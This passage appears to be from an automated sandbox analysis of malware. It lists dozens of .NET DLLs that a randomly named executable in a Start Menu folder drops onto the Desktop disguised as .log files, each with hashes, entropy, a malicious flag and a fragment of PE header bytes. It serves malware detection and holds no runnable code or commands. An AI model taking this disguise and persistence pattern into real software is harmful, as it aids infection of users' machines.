                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\XUBRajkw.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                        C:\Users\user\Desktop\XcNSPwyw.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\XfGAYNcS.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                        C:\Users\user\Desktop\XkxktgYB.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\YZpakwNq.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\YbtaoKyW.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\YjjrLEtu.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                        C:\Users\user\Desktop\YsCiJgGh.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\YuMryEyW.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\YvtbMwXu.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\YwaKaovT.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ZXnzwSps.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ZYViKKNQ.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ZYWXQKba.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ZaghFjTO.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ZnXAVSVo.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ZpcBYfHT.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ZtCSvoKO.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\aVcAAtju.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                        C:\Users\user\Desktop\aZMqfwUo.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
